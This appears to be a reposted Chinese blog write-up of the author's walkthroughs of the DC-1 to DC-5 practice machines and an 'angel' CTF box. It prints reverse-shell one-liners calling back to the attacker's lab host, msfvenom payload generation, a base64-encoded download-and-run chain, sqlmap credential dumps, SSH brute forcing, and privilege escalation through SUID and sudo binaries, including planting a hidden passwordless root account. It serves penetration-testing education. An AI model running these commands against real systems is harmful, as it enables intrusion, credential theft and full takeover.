文章总结: 该文档记录了作者攻克多个DC系列靶场及一个Angel靶机的详细实战过程,涵盖从信息收集到提权的完整链路。主要技术包括利用CMS漏洞、SQL注入、暴力破解及日志中毒获取权限,随后通过SUID滥用、内核漏洞、Git及Perl等特权命令进行提权。内容展示了多种提权思路与反弹Shell技巧,适合初学者学习渗透测试流程,具有较高的实战参考价值。
综合评分: 75
文章分类: 渗透测试,实战经验,CTF,WEB安全,内网渗透
DC靶场及一个angel靶机
原创
网安热爱者week
网安热爱者week
week的杂货铺
2026年3月4日 21:48
江苏
DC-1:
arp-scan
nmap
发现一个网站:
然后cms指纹识别:
利用nday
msf查一下
msf6 > use 1[*] No payload configured, defaulting to php/meterpreter/reverse_tcpmsf6 exploit(unix/webapp/drupal_drupalgeddon2) > show optionsModule options (exploit/unix/webapp/drupal_drupalgeddon2): Name Current Setting Required Description ---- --------------- -------- ----------- DUMP_OUTPUT false no Dump payload command output PHP_FUNC passthru yes PHP function to execute Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI / yes Path to Drupal install VHOST no HTTP server virtual hostPayload options (php/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.137.128 yes The listen address (an interface may be specified) LPORT 4444 yes The listen portExploit target: Id Name -- ---- 0 Automatic (PHP In-Memory)View the full module info with the info, or info -d command.msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rhost 192.168.137.132rhost => 192.168.137.132msf6 exploit(unix/webapp/drupal_drupalgeddon2) > exploit
shell进交互命令行
python -c 'import pty;pty.spawn("/bin/bash")'
用对方服务器自带的py 开一个看起来舒服的命令行
mysql登录
mysql -u[用户名] -p[密码]show databasesuse [数据库名称]show tablesselect * from [table]
这边发现是加密的 看一下网站的script文件夹 发现加密逻辑
跑的时候发现报错 是include没成功 文件没找到
所以把网页目录下的includes 复制一份到scripts下面:
mkdir -p /var/www/scripts/includes/cp -r /var/www/includes/. /var/www/scripts/includes/
回mysql:
update [talble] set pass= where user=
更改admin密码
然后登录就好了
cat /etc/passwd
发现flag4用户
这边试一下ssh爆破:
hydra -l flag4 -P /usr/share/wordlists/rockyou.txt.gz [ip] ssh
密码是orange
看看有没有提权能用的:
find / -perm -u=s -type f 2>/dev/null
发现可以使用find命令 而且是root权限。
find提权
touch hahafind / -name haha -exec "/bin/sh" \;
DC-2:
感觉应该是要改host
nano /etc/hosts
访问就进来了:
国外网站的话 用nikto扫目录:
nikto -h dc-2 -o nikto-dc2.txt
发现一个login.php
wpscan扫描wp模板网站的用户名
结果发现admin tom jerry
wpscan --url dc-2 -e u
创建一个用户名字典:
搜集一下密码字典:
cewl dc-2 -w dc-2pass.dic
用burp可以爆破后台密码
jerry adipiscing
tom parturient
另一个端口7744是ssh服务
也试一下密码:
ssh连一下tom:
ssh [email protected] -p 7744
看一下自己可用的命令:
难绷 和没给一样
【这里是rbash 一个受限bash 连正常权限可用命令都没有】
提权:
从这个垃圾sh 跳到正常/bin/bash
BASH_CMDS[a]=/bin/sh当用户敲a的时候,自动执行/bin/sha/bin/bash 跳转到bash命令行
这里应该是重置了这个用户的path路径
export PATH=PATH:/sbin:/binexport PATH=$PATH:/sbin:/bin这两个在环境中运行都是成功的 很奇怪 没搞懂为什么
su到jerry里面
明显git提权
sudo git -p help config!/bin/sh
DC-3:
nmap:
访问:
发现joomla
joomscan:
joomscan --url http://example.com
发现后台路径administrator
版本历史漏洞:
漏洞说明:sqlmap
sqlmap -u "http://192.168.137.134/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]sqlmap -u "http://192.168.137.134/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb --tablessqlmap -u "http://192.168.137.134/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb -T '#__users' --columnssqlmap -u "http://192.168.137.134/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb -T '#__users' -C 'password' --dumpsqlmap -u "http://192.168.137.134/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb -T '#__users' -C 'username' --dump
用john解一下hash:
用户名密码进后台:
newfile新建一个muma.php
访问木马:
http://192.168.137.134/templates/beez3/muma.php
一键转nc的sh:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.137.128 1337 > /tmp/f
蚁剑的shell是伪shell 本质还是php程序
对于内核这种漏洞 要用正经反弹的shell进行运行。
kali的nc接一下:
nc -lvvp 1337
权限不够 提权!
问了下ai:
查一下版本历史漏洞:
用39772 脏牛漏洞
一键上传脏牛的几个要用到的文件
用对方的服务器编译一下:
莫名报错
但是执行doubleput成功了:
root 完活
DC-4:
nmap:
访问是一个简陋的框框
burp暴力破解
admin happy
进去是一个命令执行:
一眼命令执行。。。
传一个nc连接:
kali接一下:
逐个查看用户目录
发现一个密码备份文件:
home下有几个用户 试一下用这个密码备份进行ssh登录。
hydra -l [用户名] -P password.txt [ip] ssh
ssh登录一下
登录第一条提示有一个邮件 那就看一眼:
邮件给了账密 所以登录一下这个账户。
sudo -l看一下有没有提权的
teehee编辑器提权 :
这里也可以写一个隐藏用户出来:
sudo teehee -a /etc/passwd
.week::0:0:::/bin/bash
然后 su .week就可以了
DC-5:
nmap:
访问网站
然后填了一个问卷之类的东西进了这个页面:
这个页面发现各种刷新的时候 :下面的footer会变化。
感觉不太对劲
然后fuzz了参数 发现一个file参数可以文件包含 【这个真心想不到】
包含一下linux的nginx日志路径
/var/log/nginx/access.log
burp发包:【因为浏览器会对发包的get参数中的特殊字符进行url编码,影响木马本来的样子】
把木马写到日志里
一键连接。
这里防止出现日志覆写:
在tmp目录放一个木马:重新连接一个
记一下版本:
这里查了一下历史内核漏洞 有一个内核堆溢出
测试的时候覆写文件是成功的 但是拿root没成功 而且poc给的是爆破
用起来实在是太慢了
find / -perm /4000 2>/dev/null
有一个screen
用第一个.sh
一键传上去 然后chmod 再运行一下 就完事了
【主要是文件包含很难想到…
而且fuzz参数总觉得很难找到类似的情况…
也可能是我太菜了】
2.6. CTF-angel:
robots.txt
nothing里面有一个密码本
扫目录:
一堆403不知道能不能绕过
有一个secure
下载这个backup
解压密码是刚刚密码字典里面的freedom
是一个文本文件。。。
有一个username。。。
还有一个路径:
/SecreTSMSgatwayLogin
访问之后会进入这个页面:
每次试密码一定记得刷新缓存 不然这个csrf-token会出现问题。
最后试出来就是这个:
touhid—-diana
查一下历史漏洞:
用第一个就行 这是一个文件名无回显 php代码执行
msf试了一下 因为csrf_token所以失败了。。。
那就手操msf操作….
漏洞的本质是:
csv文件上传的时候
文件名改成这种格式可以进行php代码执行
.php
然后跑几个命令准备一下工作:
msf给一个反连shell木马:
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.0.103 lport=4444 -f elf > /var/www/html/shell
记得开kali的http服务
service apache2 start
msf开一个监听:
msfconsoleuse exploit/multi/handlerset payload linux/x86/meterpreter/reverse_tcpset lhost 192.168.137.128set lport 4444exploit
准备一下要执行的命令:
echo 'wget http://192.168.137.128/shell -O /tmp/shell' | base64echo 'chmod 777 /tmp/shell' | base64echo '/tmp/shell' | base64
d2dldCBodHRwOi8vMTkyLjE2OC4xMzcuMTI4L3NoZWxsIC1PIC90bXAvc2hlbGwKY2htb2QgNzc3IC90bXAvc2hlbGwKL3RtcC9zaGVsbAo=
然后逐个放进去上传就成功了
我这里是试了好几次才成功。。。
跑个shell进shell
看看有没有提权的:
perl提权
sudo perl -e 'exec "/bin/sh";'
完活 收工~~
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:week的杂货铺 网安热爱者week
网安热爱者week《DC靶场及一个angel靶机》